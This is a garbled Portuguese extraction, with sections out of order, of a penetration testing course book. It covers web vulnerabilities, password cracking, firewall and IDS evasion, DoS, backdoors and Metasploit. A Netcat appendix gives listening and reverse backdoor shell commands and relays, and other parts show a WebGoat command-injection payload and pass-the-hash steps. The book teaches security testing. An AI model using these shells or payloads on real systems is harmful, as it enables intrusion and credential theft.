28. proc e Obter informa es de configura es Ex etc resolv conf e BONUS Permite executar comandos e AVAN ADO Permite obter senha de acesso ao servidor 13 4 7 Falha de Autentica o e gerenciamento de sess o Todas as vezes que um usu rio precisa autenticar se em uma p gina para acessar conte dos pessoais propriet rios ou sigilosos uma s rie de par metros enviada ao servidor para que o mesmo valide o usu rio e crie uma sess o pr pria para o mesmo Se esse mecanismo tiver falhas um atacante pode explor las e conseguir acessos as informa es confidenciais Vamos ver a seguir os conceitos e formas de ataque e O que sess o Cap tulo 13 Vulnerabilidades em aplica es web 165 A sess o session em ingl s tem uma fun o bem parecida com a do cookie que foi explicado no t pico anterior A sess o estabelece uma conex o entre o usu rio e o servidor sendo mais segura que o cookie Os dados que s o gravados na sess o desaparecem quando o browser fechado Por exemplo ao fazer um login o usu rio digita seu nome e senha Essas informa es s o gravadas na sess o e n o como no cookie em que s o armazenadas em um arquivo texto Assim podemos navegar pelo site e as informa es s ser o perdidas quando o browser for fechado Pelo fato de n o gravar as informa es em arquivos tempor rios a sess o um meio muito mais seguro de se fazer login e gravar inform
29. v on Linux vv on Windows not resolving names n without sending any data z and waiting no more Cap tulo 21 Desafios Testes de Invas o 273 than 1 second for a connection to occur w1 The randomize ports r switch can be used to choose port numbers randomly in the range TCP Banner Grabber Grab the banner of any TCP service running on an IP Address from Linux echo nc v n wl TargetIPaddr start port end port Attempt to connect to each port in a range from end port to start port on IP Address TargetlPaddr running verbosely v not resolving names n and waiting no more than 1 second for a connection to occur w1 Then send a blank string to the open port and print out any banner received in response Backdoor Shells Listening backdoor shell on Linux nc l p LocalPort e bin bash Listening backdoor shell on Windows C gt nc l p LocalPort e cmd exe Create a shell on local port LocalPort that can then be accessed using a fundamental Netcat client Reverse backdoor shell on Linux nc YourIPaddr port e bin bash Reverse backdoor shell on Windows C gt nc YourIPaddr port e cmd exe Create a reverse shell that will attempt to connect to YourlPaddr on local port port This shell can then be captured using a fundamental nc listener Netcat Relays on Linux To start create a FIFO named pipe called backpipe S cd tmp mknod backpipe p
30. Backdoors V rus Rootkits e Worms 128 Cap tulo 11 Ignorando Prote es 11 1 Objetivos e Conhecer os mecanismos de evas o de firewall e Conhecer as t cnicas de evas o de IDS IPS e Entender as t cnicas de anti forense Cap tulo 11 Ignorando Prote es 129 11 2 Evas o de Firewall IDS com Nmap As t cnicas de evas o de firewall e IDS s o utilizadas para evitar que qualquer tipo de aplica o que contenha filtros e controles de acesso possam detectar as a es do atacante Tanto ferramentas espec ficas quanto par metros de ferramentas cujo objetivo de utiliza o n o especificamente esse podem ser usados Abaixo vamos ver alguns par metros do Nmap que podem ser utilizados para burlar prote es e do Firewall Tester FTester que utilizado para testar regras de firewall pesquisando como est o n vel de bloqueio e detec o de pacotes maliciosos e f gt fragmenta pacotes incluindo pacotes IP A id ia dividir os cabe alhos TCP em v rios pacotes dificultando a detec o por filtros de pacotes IDS e etc e D lt decoy1l gt lt decoy2 gt 1 LMEJL gt realiza uma varredura utilizando iscas Faz parecer que v rios hosts da rede juntamente com seu IP est o varrendo o alvo Desse modo o IDS pode reportar 5 10 varreduras em um nico IP mas n o saber definir quais s o iscas inocentes e qual IP est realmente realizando a varredura e S lt IP Address g
31. Listener to Client Relay nc 1 p LocalPort O lt backpipe nc TargetIPaddr port tee backpipe Create a relay that sends packets from the local port LocalPort to a Netcat client connected to TargetlPaddr on port port Listener to Listener Relay nc l p LocalPort 1 O lt backpipe nc l p LocalPort 2 tee backpipe Create a relay that sends packets from any connection on LocalPort 1 to any connection on LocalPort 2 Client to Client Relay S nc PreviousHopIPaddr port O lt backpipe nc NextHopIPaddr port2 tee backpipe Create a relay that sends packets from the connection to PreviousHopIPaddr on port port to a Netcat client connected to NextHoplPaddr on port port2 Netcat Relays on Windows To start enter a temporary directory where we will create bat files C gt cd c temp Cap tulo 21 Desafios Testes de Invas o 274 Listener to Client Relay C gt echo nc TargetIPaddr port gt relay bat C gt nc l p LocalPort e relay bat Create a relay that sends packets from the local port LocalPort to a Netcat Client connected to TargetlPaddr on port port Listener to Listener Relay C gt echo nc 1 p LocalPort 2 gt relay bat C gt nc 1 p LocalPort 1 e relay bat Create a relay that will send packets from any connection on LocalPort 1 to any connection on LocalPort 2 Client to Client Relay C gt echo nc NextHopIPaddr port2
32. Para facilitar e possibilitar a utiliza o das t cnicas aprendidas no curso sem causar qualquer tipo de comprometimento a ambientes reais podemos utilizar como ferramenta o que conhecido como War Games jogos que simulam ambientes reais e permitem colocar em pr tica t cnicas de explora o de vulnerabilidades 1 11 1 War Games desktop e Uplink e Hacker Evolution e BSHacker e Street Hacker e MindLink e Cyber Wars 1 11 2 War Games online e http www hackthissite org e http www hackquest de e http www hack4u org Cap tulo 1 Introdu o Seguran a da Informa o 26 e http www mod x co uk main php e http bigchallenge free fr e http www hackertest net Cap tulo 1 Introdu o Seguran a da Informa o 27 1 12 Exerc cios te ricos 1 O que um exploit 2 Qual a import ncia da seguran a da informa o nos dias de hoje 3 Que tipo de prote o pode ser utilizar para manter a integridade de uma informa o que trafega por meios n o seguros 4 Em qual norma podemos nos basear para implantar controles que podem proteger servidores de uma rede Cap tulo 1 Introdu o Seguran a da Informa o 28 Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 2 1 Objetivos e Fornecer ao aluno uma vis o geral sobre testes de invas o e Entender a anatomia e os tipos diferentes de ataques e Conhecer as fases de
33. mais ou menos da maneira como ocorre no shell de roteadores Cisco por exemplo Abaixo vou dar uma explica o b sica das op es que o John suporta Se voc se esquecer de alguma op o quando estiver utilizando o JtR s digitar john no terminal e todas as op es ser o impressas para voc As op es podem ser definidas utilizando ou e seus par metros s o definidos utilizando ou single Define o modo single para quebrar as senhas wordlist ARQUIVO Define o modo wordlist para quebrar as senhas e define o arquivo ARQUIVO como sendo de onde as senhas ser o lidas Aqui voc pode utilizar tamb m a op o stdin para dizer que as palavras vir o da entrada padr o incremental Define que ser utilizado o modo incremental para quebrar a senhas Opcionalmente voc pode definir que tipo de modo incremental ser utilizado fazendo incremental MODO external MODO Define que ser utilizado o modo external rules Habilita as regras para wordlist definidas em john conf quando se utiliza o modo wordlist stdout LENGTH Quando utilizado faz com que o JtR imprima as poss veis senhas direto na sa da padr o ao inv s de tent las contra um hash Se voc definir o par metro LENGTH s ser o impressas senhas com caracteres at a quantidade especificada em LENGTH restore NOME Faz com que uma sess o que foi interrompida anteriormente continue de onde parou Se vo
34. nel de uma porta arbitr ria at a porta em que o servidor do primeiro terminal estiver escutando e o terceiro terminal vai se conectar tamb m de maneira regular porta arbitr ria do tunel que levar essa conex o at a sua sa da no servi o do primeiro terminal e Ti servidor E l nc l vv 1026 bin bash e T2 t nel q nc l vv 1025 nc localhost 1026 e T3 cliente E nc localhost 1025 Cap tulo 7 Varreduras ativas passivas e furtivas de rede 89 7 9 Anonymizer Os programas de anonymizer funcionam basicamente para ocultar seus dados enquanto navega na internet Normalmente a aplica o utilizada para isso um proxy que ap s configurado permite que seu IP seja mascarado fornecendo o dele como IP real Com isso poss vel proteger o conte do de e mails textos de softwares de mensagens instant neas IRC e outros aplicativos que usam o protocolo TCP Uma boa ferramenta para utilizarmos mantendo nossos dados de navega o protegidos o TOR The Onion Router O programa foi desenvolvido pelo Laborat rio Central da Marinha para Seguran a de Computadores com a ajuda da Darpa www darpa mil a ag ncia criada no auge da guerra fria com o objetivo de transformar os Estados Unidos em uma superpot ncia tecnol gica Para quem n o se lembra foi a Darpa na poca sem o D quem coordenou os estudos para a constru o de uma rede d
35. o Trap Request na aba Trap 13 7 Laborat rio WebGoat e Iremos testar cada uma das vulnerabilidades estudadas utilizando a ferramenta WebGoat e Ap s execut la com o comando webgoat sh start8080 Cap tulo 13 Vulnerabilidades em aplica es web 171 e Acessar o endere o Q http guest guest 127 0 0 1 8080 webgoat attack e Algumas ser o explicadas pelo instrutor e outras o aluno resolver sozinho e As solu es encontram se na pr pria aplica o e H um link para os v deos com as solu es na pr pria aplica o tamb m caso as dicas escritas n o estejam claras 13 7 1 Solu es para os desafios gt WebGoat Code Quality Basta olhar o c digo fonte do html pois o login e senha est o comentados no c digo gt Injection Flaws gt Command Injection Precisamos injetar um comando No caso do Windows devemos usar o amp para usar mais de um comando na mesma linha O amp no Windows seria como o do linux que usado para separar comandos na mesma linha Por m precisamos usar o 26 que o amp j que o amp usado para determinar uma nova vari vel Podemos explorar usando o Paros Proxy Repare que precisamos fechar uma aspas dupla sen o obtemos um erro C digo injetado 26 ping lt um ip valido gt gt Injection Flaws gt Blind Sql Injection Quando o caractere existir ele mostrara que um determinado Account number valido Como o p
36. o geral sobre seguran a n o se limita apenas a um poss vel invasor ou acesso n o autorizado ao sistema seguran a de software significa manter o software em seu perfeito funcionamento ou seja o funcionamento imaginado pelo desenvolvedor No cen rio atual da seguran a da informa o infelizmente tentamos proteger a informa o n o pela raiz do problema escrevendo programas com qualidade mas criando outros softwares para proteger um software mal desenvolvido anteriormente Por exemplo instalamos um software que tem erros de programa o que pode ser explorado por um intruso ent o instalamos um firewall que tentar bloquear o tr fego de dados entre o software e o acesso n o autorizado Esse tipo de abordagem n o tem se mostrado muito eficaz E se esse programa feito para proteger o software mal desenvolvido tamb m conter os mesmos erros de programa o Ferramentas como o Metasploit podem ajudar aos desenvolvedores de software produzirem software com maior qualidade do ponto de vista da seguran a na medida que incentiva os programadores a pensarem a respeito de como algumas t cnicas de programa o levam as falhas de seguran a O Metasploit framework um conjunto das melhores plataformas de aprendizagem e investiga o para o profissional de seguran a ou do hacker tico Ele possui centenas de exploits payloads e ferramentas muito avan adas que nos permite testar vulnerabilidades em muitas plataformas sistem
37. tmp wordlist sort u gt tmp wordlist inteligente O wyd consegue gerar combina es a partir de arquivos em texto puro html php doc ppt pdf odt ods e odp 12 5 John The Ripper O John um dos utilit rios mais conhecidos para decifrar senhas no Linux pois consegue decifrar algoritmos usados pelo sistema como o MD5 e outras Toda a configura o do John feita em um arquivo texto chamado john conf em sistemas Cap tulo 12 T cnicas de For a Bruta 137 Unix ou john ini no Windows por exemplo Neste arquivo voc consegue definir regras para a descoberta de senhas wordlists par metros para os modos e at definir um novo modo de descoberta de senhas Este arquivo dividido em v rias se es Todas as se es come am com uma linha com seu nome entre colchetes As op es destas se es s o definidas em vari veis de modo bem simples como em e vari vel valor Os nomes de se es e vari veis s o case insensitive ou seja SECAO1 e secaol s o a mesma se o e VARI e var1 s o a mesma vari vel Os caracteres e s o completamente ignorados assim como linhas em branco Abaixo est o as explica es das op es dividas por se o Options e Wordlist A wordlist a ser utilizada pelo JtR O arquivo pode estar em qualquer lugar basta especificar o caminho correto nessa vari vel e Idle Configura o John para usar seu CPU quando este estiver inativo Diminui o dese
38. uma das melhores armas verificar as atualiza es de seguran a dos sistemas operacionais e softwares utilizados pelos computadores Muitos v rus aproveitam de vulnerabilidades para efetuar contamina es e posteriormente usar a m quina como zumbi Tamb m importante filtrar certos tipos de pacotes na rede e desativar servi os que n o s o utilizados Cap tulo 9 Testando o sistema 117 9 9 1 Find DdoS uma ferramenta que foi desenvolvida por um rg o do FBI em fun o da grande quantidade de ataques DDoS ocorridos O find ddos localiza no sistema os masters e agentes das ferramentas Trin00 Tribe Flood Network TFN2k e Stacheldraht Cap tulo 9 Testando o sistema 118 Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 10 1 Objetivos e Entender a diferen a entre v rus e worms e Entender o funcionamento das backdoors e Entender as funcionalidades do trojan e Entender o conceito de rootkit Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 119 10 2 Backdoor As backdoors s o programas destinados a fornecer um meio de acesso remoto ao hacker a uma m quina que provavelmente teve sua seguran a comprometida por ele anteriormente Normalmente esses programas abrem uma porta no computador atacado e nessa porta tem o servidor do hacker escutando apenas esperando o hacker se conectar nela para dar total acesso ao computador Mas como esse m todo ficou f cil de ser det
39. IP 192 168 0 1 preciso digitar o comando no prompt msf gt lt set RHOST 192 168 0 1 Vejamos abaixo como ficou a configura o de ambas op es Agora precisamos completar o exploit executando o contra o alvo Para tanto temos duas alternativas 1 utilizar o comando check em primeiro lugar para ver se nosso alvo vulner vel a esse exploit e depois usar o comando exploit para execut lo ou 2 utilizar diretamente o comando exploit para executar o ataque posto que alguns m dulos n o aceitam a execu o do comando check Cap tulo 19 Metasploit Framework 230 No caso desse exploit o comando check n o suportado ent o teremos que usar o comando exploit sem a possibilidade de testar anteriormente se o alvo suscet vel ao ataque Se o ataque falhar contra o alvo um aviso como se segue ser exibido Se n o sendo o alvo vulner vel a esse ataque voc ser apresentado a uma interface de linha de comando interativa da m quina designada ou seja voc cair no prompt de comando N o desanime se n o conseguir de primeira Isto s significa que a m quina que est testando n o vulner vel a esse ataque espec fico 19 11 An lise final Sinta se vontade para testar com outros exploits e outros payloads afinal esta a ess ncia da invas o com o Metasploit testar at descobrir qual a vulnerabilidade certa e usar uma combina o de exploit e pay
40. Standard Error Cap tulo 14 Eleva o de Privil gios Locais 178 Cap tulo 15 T cnicas de Sniffing 15 1 Objetivos e Entender ARP Poisoning e Entender os protocolos suscet veis a sniffer e Entender a diferen a entre HUB e Switch e Entender DNS Pharming Cap tulo 15 T cnicas de Sniffing 179 15 2 O que um sniffer Sniffer uma ferramenta capaz de capturar todo o tr fego de uma rede Assim sendo poss vel capturar tr fego malicioso de trojans e tamb m capturar as senhas que trafegam sem criptografia pela rede Ap s uma invas o comum que um cracker instale um sniffer na m quina atacada para visualizar as senhas que trafegam em busca de mais acessos dentro da rede Embora seja mais f cil capturar pacotes em uma rede que utiliza hubs tamb m poss vel realizar a captura de dados em redes que utilizam switches A t cnica de sniffer vem de tempos remotos quando houve a necessidade da cria o de ferramentas deste tipo para depura o de problemas de rede Por m com o tempo devido a forma que as redes funcionavam as pessoas come aram a usar isto para fins maliciosos como fazer escuta do tr fego da rede em busca de informa es sens veis como e mails contas de ftp telnet snmp dentre outros 15 3 Como surgiu o sniffer A captura de tais dados era muito trivial em redes que possu am HUBs onde a informa o trafegada replicada por toda a rede Como evolu o sur
41. Vamos qual o resultado que obtemos a esse comando domain 4linux com br owner 4linux Software e Com rcio de Programas Ltda ownerid 004 491 152 0001 95 responsible Rodolfo Gobbi country BR owner c RJG43 admin c RJG43 Cap tulo 5 Levantamento de Informa es 57 tech c CEADO billing c RJG43 nserver ns1 4linux com br 200 212 122 137 nsstat 20100616 AA nslastaa 20100616 nserver ns2 4linux com br 66 118 187 158 nsstat 20100616 AA nslastaa 20100616 created 20010518 569350 expires 20110518 changed 20100525 status published nic hdl br CEADO person Cesar Augusto Domingos e mail cesar domingos gmail com created 20070925 changed 20070925 nic hdl br RJG43 person Rodolfo Jose Martorano Gobbi e mail adm 4linux com br created 20040119 changed 20070502 Podemos concluir que com um simples comando disponivel em praticamente qualquer sistema operacional foi possivel obter o nome do responsavel pelo dominio o nome do respons vel t cnico pelo dominio o nome dos dois servidores de DNS e o CNPJ da empresa localizado no campo ownerid Al m da consulta whois em sistemas operacionais poss vel ainda utilizar servi os que consultam o a base de dados de propriet rios de dom nios atrav s de ferramentas web como o pr prio http registro br por exemplo Cap tulo 5 Levantamento de Informa es 58 https registro br cgi bin whois
42. WPA e as t cnicas de ataque e Entender como funciona o ataque baseado em Rainbow Tables Cap tulo 17 Ataques a Redes Sem Fio 198 17 2 Introdu o Nunca deixe sua rede wireless desprotegida sem senha ou com protocolo WEP pois por padr o ser quebrado por qualquer pessoa com pouco conhecimento podendo assim ter acesso a informa es confidenciais Uma rede wireless mal projetada pode driblar todo o arsenal de defesa j implementado Vamos imaginar a seguinte situa o sua empresa colocou uma muralha ex firewall para prote o dos ataques Por m a muralha completamente ineficiente contra os ataques a reos ex wireless Antes de come ar a implementar uma rede wireless fa a um planejamento e estude toda a topologia da rede N o se esque a de evitar os ataques a reos 17 3 Wardriving Um dos ataques mais comuns e comentados em redes wireless o War Driving que tem como objetivo andar com um dispositivo wireless em busca de Access Points Esse ataque tira proveito de uma caracter stica fundamental dif cil controlar e limitar o alcance de redes wireless O atacante pode estar neste exato momento passeando no seu carro e com o laptop ligado procurando redes wireless vulner veis Essa t cnica tem como objetivo identificar as redes sem fio acess veis de um determinado local Cap tulo 17 Ataques a Redes Sem Fio 199 17 4 Ataques ao protocolo
43. a nas bases do Google sem precisar de nenhum cadastro por parte do criador do site nas ferramentas de buscas Por m isso exp s muitas informa es e para isso foram criados os arquivos robots txt Um webspider consulta o arquivo robots txt que est localizado no diret rio raiz do website para saber quais arquivos ele n o deve analisar Portanto os arquivos ou diret rios que est o listados em um arquivo robots txt n o aparecer o nos resultados das buscas realizadas em sites como o Google Vamos a um exemplo Q http www 4linux com br robots txt Portanto os arquivos robots txt podem revelar para n s informa es sobre arquivos e diret rios que poder amos n o conhecer e at mesmo n o estar linkado no site Mais informa es sobre os arquivos robots txt podem ser obtidas no site tw http www robotstxt org orig html 5 8 Netcraft Netcraft uma empresa europ ia que prove servi os de internet Dentro de Cap tulo 5 Levantamento de Informa es 61 alguns servi os que ela fornece est a an lise de mercado para empresas de web hosting e servidores web incluindo detec o do sistema operacional e vers o do servidor web e em alguns casos informa es sobre uptime do servidor j que normalmente esse fator determinante na escolha de uma empresa de hospedagem de sites Para n s pode ser til para exibir a vers o do sistema operacional e servidor web que um deter
44. acompanha os notici rios de inform tica ou o pr prio Boletim Anti V rus do InfoWester certamente j se deparou com mat rias que citam ataques DoS ou ataques DDoS a sites O objetivo deste cap tulo dar explica es sobre isso e tamb m mostrar as consequ ncias de tais ataques Durante um ataque de nega o de servi o o atacante deixa o sistema imposs vel de ser usado ou significantemente lento a ponto de conseguir realizar poucas tarefas Esses ataques podem ser realizados contra um sistema individual ou contra uma rede inteira e normalmente s o realizados com sucesso Qualquer tipo de ataque que afete o pilar Disponibilidade da tr ade Confidencialidade Integridade Disponibilidade pode ser considerado um ataque de nega o de servi o desde puxar a tomada de alimenta o de energia de um servidor at utilizar uma rede zumbi para ataque em massa Na maior parte das vezes o objetivo do atacante n o conseguir acesso informa es roubo de dados ou tomar o controle da m quina O objetivo realmente causar a indisponibilidade de servi os nos sistemas do alvo e isso pode levar a potenciais preju zos financeiros do ponto de vista comercial por exemplo Abaixo temos alguns exemplos de ataques realizados em site conhecidos que de alguma forma causou preju zos financeiros aos sites atacados Exemplos de ataques e Contra DNS da Telefonica v Speedy e Contra sistema de vota o do BBB v Globo e Cont
45. aplica es web 170 ele envia antes o pedido para o proxy e s ent o o proxy envia o pedido para o servidor web Posteriormente o servidor web devolve a resposta para o proxy que devolve a resposta para o navegador web por isso que muitos usam servidores proxys que encontram na internet para acessar um site de forma an nima pois o endere o IP que aparecer no servidor web o endere o do proxy e n o o endere o real da pessoa que est usando esse proxy Ent o o Paros e ferramentas semelhantes a ele onde podemos citar o Webscarab nos da a op o de editar um conte do que j partiu do navegador web mas ainda n o foi enviada para o servidor web Isso extremamente til para passar por filtros que s o criados em Java Script j que o JavaScript executado no computador do cliente e n o no servidor Ent o basta alterar os dados quando os mesmos chegarem ao proxy no nosso caso o Paros Proxy Configurando o Paros Para configurar o Paros muito simples Basta inici lo Ele j vai funcionar na porta 8080 localhost Se deseja alterar a porta basta ir em Tools gt Options gt Local Proxy e alter la Uma vez que o Paros foi iniciado basta usar um proxy no navegador web seja ele IE Firebox ou qualquer outro Alterando as requisi es Por padr o o Paros n o abrir uma janela esperando que editemos ou confirmemos os par metros enviados pelo navegador Para isso basta selecionar a op
46. de No Tech Hacking Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 73 6 2 O que Engenharia Social Podemos considerar a engenharia social como a arte de enganar pessoas para conseguir informa es as quais n o deviam ter acesso Muitas vezes empregados de uma empresa deixam escapar informa es sigilosas atrav s de um contato via telefone ou mesmo conversando em locais p blicos como corredores elevadores e bares Uma empresa pode ter os melhores produtos de seguran a que o dinheiro pode proporcionar Por m o fator humano em geral o ponto mais fraco da seguran a N o existe Patch para a burrice humana 6 3 Tipos de Engenharia Social 6 3 1 Baseada em pessoas As t cnicas de engenharia social baseada em pessoas possuem diversas caracter sticas que s o utilizadas para que o atacante consiga as informa es que deseja dentre elas podemos citar e Disfarces e Representa es e Uso de cargos de alto n vel e Ataques ao servi o de Helpdesk e Observa es 6 3 2 Baseada em computadores Esses ataques s o caracterizados por utilizarem t cnicas de ataque baseadas no desconhecimento do usu rio com rela o ao uso correto da inform tica Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 74 Exemplos e Cavalos de Tr ia anexados a e mails e E mails falsos e WebSites falsos 6 4 Formas de ataque 6 4 1 Insider Attacks Insiders s o pessoa
47. de tratamento especial para que n o sejam comprometidas de alguma maneira Dentre os servi os oferecidos por profissionais de seguran a est o e Cria o de Pol ticas de Seguran a e Implanta o de CSIRTs e Hardening de Servidores e An lise de Vulnerabilidade e Teste de Invas o e An lise de Aplica o e Per cia Computacional e Treinamento de Colaboradores e Auditoria Cap tulo 1 Introdu o Seguran a da Informa o 24 1 10 Certifica es Na rea de seguran a h muitas certifica es reconhecidas pelo mercado Sendo que cada ma delas possui um foco diferente n vel de conhecimento diferente e formas de avalia es diversas Abaixo listamos as principais certifica es da rea de SI CompTIA Security Cisco Systems CCNA Security CCSP CCIE Security EC Council CEH CHFI ECSA ENSA LPT GIAC GSIF GSEC GCIA GCFW GCFA GCIH GPEN GCUX GCWN GWAPT e GAWN GREM GSE ISACA CISA CISM ISC CAP CISSP CSSLP ISSAP ISSEP ISSMP SSCP ISECOM OPSA OPST Offensive Security OSCP OSCE Immunity NOP Dentro do conteudo estudado e de acordo com o contexto que estamos estudando algumas certifica es possuem em sua avalia o muito dos assuntos Cap tulo 1 Introdu o Seguran a da Informa o 25 abordados em aula Podemos citar dentre essas as certifica es e CEH ECSA LPT OPSA OSCP GPEN 1 11 War Games
48. disso surgem in meros problemas graves de consequ ncias desastrosas Com o aumento da complexidade da infraestrutura e consequentemente da sobrecarga dos administradores de rede torna se cada vez mais dif cil gerenciar tudo o que ocorre e monitorar satisfatoriamente o funcionamento da infraestrutura organizacional 1 6 Princ pios b sicos da seguran a da informa o A rea de SI possui tr s pilares b sicos com o acr scimo de mais duas que permitem a troca segura de informa o desde que nenhum deles seja violado S o eles 1 6 1 Confidencialidade Esse pilar o respons vel pelo controle de acesso informa o apenas por aquelas pessoas ou entidade que tenham permiss o compat vel com sua fun o e Cap tulo 1 Introdu o Seguran a da Informa o 18 determinada pelo dono daquela informa o 1 6 2 Integridade Aqui atrav s dessa propriedade determinada a necessidade de garantir que a informa o mantenha todas as suas caracter sticas originais como determinadas pelo propriet rio da informa o 1 6 3 Disponibilidade Propriedade que define que determinada informa o esteja sempre dispon vel para o acesso quando necess rio de maneia ntegra e fidedigna Alguns dos ataques conhecidos buscam justamente derrubar a disponibilidade e para algumas empresas o simples fato de n o ter suas informa es dispon veis durante determinado per odo de tempo isso pode acarretar pre
49. es SYN para um sistema alvo Quando um cliente tenta come ar uma conex o TCP com um servidor o cliente e o servidor trocam um s rie de mensagens que normalmente s o assim e O cliente requisita uma conex o enviando um SYN synchronize ao servidor e O servidor confirma esta requisi o mandando um SYN ACK acknowledge de volta ao cliente e O cliente por sua vez responde com um ACK e a conex o est estabelecida Isto o chamado aperto de m o em tr s etapas Three Way Handshake Cap tulo 9 Testando o sistema 110 Client Cy Qa srr SYN a Synchronize Acknowledge q SYN ACK Client gt Server Um cliente malicioso pode n o mandar esta ltima mensagem ACK O servidor ir esperar por isso por um tempo j que um simples congestionamento de rede pode ser a causa do ACK faltante Esta chamada conex o semi aberta pode ocupar recursos no servidor ou causar preju zos para empresas usando softwares licenciados por conex o Pode ser poss vel ocupar todos os recursos da m quina com pacotes SYN Uma vez que todos os recursos estejam ocupados nenhuma nova conex o leg tima ou n o pode ser feita resultando em nega o de servi o Alguns podem funcionar mal ou at mesmo travar se ficarem sem recursos desta maneira Ao contr rio do que muitos pensam n o resolve ataque nega o de servi o por Syn flood limitando a quantidade de conex es por minut
50. final na rede alvo que pertence empresa que lhe contratou para realizar o teste de invas o voc precisa encontrar um arquivo chamado you got the flag txt Nesse arquivo encontra se o hash MD5 de um outro arquivo que pode estar em qualquer outra m quina da rede Se tal arquivo for encontrado verificando seu hash voc precisa descobrir qual a senha que est nesse arquivo ele c pia de um shadow Ap s descobrir a senha necess rio que acesse uma das outras m quinas descobrindo a qual usu rio a senha descoberta pertence Conseguindo acesso m quina que o alvo final encontre o arquivo you win png que ter o c digo que deve ser enviado para o instrutor na capa do relat rio Haver o 12 arquivos you win png distribu dos pela rede ap s descobrir o c digo existente em um deles apague o mesmo para evitar repeti o de c digos entre os participantes do desafio Happy hacking Cap tulo 21 Desafios Testes de Invas o 269 ANEXOS Cap tulo 21 Desafios Testes de Invas o 270 Primeiro anexo Op es do Nmap TARGET SPECIFICATION Can pass hostnames IP addresses networks etc Ex scanme nmap org microsoft com 24 192 168 0 1 10 0 0 255 1 254 iL lt inputfilename gt Input from list of hosts networks iR lt num hosts gt Choose random targets exclude lt host1 host2 host3 gt Exclude hosts networks excludefile lt exclude file gt
51. gicas Para cada contexto temos grupos diferentes de mecanismos que podem ser utilizados 1 8 1 Mecanismos f sicos e Portas e Trancas e Paredes e Blindagem e Guardas e C meras e Sistemas de alarme e Sistema de detec o de movimentos e Biometria Os mecanismos f sicos de prote o s o barreiras que limitam o contacto ou acesso direto a informa o ou a infra estrutura que garante a exist ncia da informa o que a suporta 1 8 2 Mecanismos l gicos e Criptografia e Firewall e Anti Virus e IDS e IPS e Proxy Cap tulo 1 Introdu o Seguran a da Informa o 23 e Anti Spam Os mecanismos l gicos s o barreiras que impedem ou limitam o acesso a informa o que est em ambiente controlado geralmente eletr nico e que de outro modo ficaria exposta a altera o n o autorizada por elemento mal intencionado 1 9 Servi os de seguran a Existe hoje em dia um elevado n mero de ferramentas e sistemas que pretendem fornecer seguran a Alguns exemplos s o os detectores de intrus es os antiv rus firewalls firewalls locais filtros anti spam fuzzers analisadores de c digo etc Al m de dispositivos de seguran a tamb m existem diversos servi os relacionados a seguran a da informa o Esses servi os precisam de profissionais com um conhecimento altamente especializado primeiro por lidar com an lises complexas e segundo por envolver informa es sigilosas que precisam
52. no frame A princ pio vari veis locais podem ser referenciadas fornecendo se seus deslocamentos em rela o ao ponteiro de pilha Entretanto quando palavras s o inseridas e retiradas da pilha estes deslocamentos mudam Apesar de em alguns casos o compilador poder corrigir os deslocamentos observando o n mero de palavras na pilha essa ger ncia cara O acesso a vari veis locais a dist ncias conhecidas do ponteiro de pilha tamb m iria requerer m ltiplas instru es Desta forma a maioria dos compiladores utiliza um segundo registrador que aponta para o topo da pilha no in cio da execu o da fun o para referenciar tanto vari veis locais como par metros j que suas dist ncias n o se alteram em rela o a este endere o com chamadas a PUSH e POP Na arquitetura Intel x86 o registrador EBP utilizado para esse prop sito Por causa da disciplina de crescimento da pilha par metros reais t m deslocamentos positivos e vari veis locais t m deslocamentos negativos a partir de FP A primeira instru o que um procedimento deve executar quando chamado Cap tulo 18 Exploits 209 salvar o FP anterior para que possa ser restaurado ao fim da execu o A fun o ent o copia o registrador de ponteiro de pilha para FP para criar o novo ponteiro de frame e ajusta o ponteiro de pilha para reservar espa o para as vari veis locais Este c digo chamado de pr logo da fun o Ao fim da execu o a pilha deve
53. opcode na arquitetura x86 Ent o invocamos a classe Rex Arch para ajustar o stack pointer e depois especificarmos a plataforma com Rex Arch X86 com os m todos jmp mov sub pack add call clear etc Outro exemplo famoso e infame a classe Rex Exploration Seh O Structured Exception Handling SEH uma prote o usada para checar o controle do fluxo cada vez que uma exce o acontece Um estouro de buffer modifica o fluxo comum Cap tulo 19 Metasploit Framework 219 do programa e o SEH trata desses erros A classe Rex Exploration Seh pode ser usada para evadir o SEH Para maiores informa es consulte http www eeye com html resources newsletters vice VI20060830 html http freeworld thc org download php t pf Practical SEH exploitation pdf Ou ainda Framework Core formado de v rios sub sistemas como gerenciamento de m dulos sess es despacho de eventos etc Framework Base Prov a interface para interagir com o Framework Core provendo configura es registro de logs e sess es Interfaces Prov a interface com o usu rio atualmente s o msfconsole msfcli msfgui msfweb msfd M dulos S o compostos pelos exploits payloads encoders NOP generators e m dulos auxiliares como por exemplo scanners conex o com base de dados MS SQL fuzzers de protocolo etc A lista completa pode ser acessada com o comando show all na interface msfconsole e informa
54. option Value Li timbuktu pl HosT 192 168 1 80 E smtp LPORT 4164 E ssh RHOST 192 168 1 201 Peel RPORT 445 SMBPIPF BROWSER Targets 0 gt Automatic Targeting z sole X scanner s 58 88bd8P Y5 LJ Use a reverse connection L Show advanced options Launch Cap tulo 19 Metasploit Framework 251 Assim como na varredura que conduzimos anteriormente toda a configura o necess ria foi feita para n s Tudo o que precisamos clicar em Launch e aguardar a sess o do Meterpreter ser aberta para n s Veja na imagem abaixo que as figuras dos alvos foi alterada para indicar que um deles foi explorado 192 168 1 204 192 168 1 205 yr 192 168 1 203 192 168 1 201 192 168 1 206 NT AUTHORITY SYSTEM XEN XP SP2 BARE Quando clicamos com o botao direito no host explorado podemos ver novas op es teis dispon veis Te _ o d SE a Meterpreter 1 gt Access gt 192 168 Services Interact gt J Comme nos DR Bplore P Meter M Pivoting MSF Scans Kill Run V Fazemos o dump dos hashes no sistema explorado em uma tentativa de recuperar a senha e utiliza la para explorar outros alvos Selecionando os demais hosts usamos o m dulo psexec com o login Administrator e o hash da senha que j conseguimos Cap tulo 19 Metasploit Framework 252 em Ive ven 70 ninna 9 mm i7_n 50 sf This module uses a valid administrator us
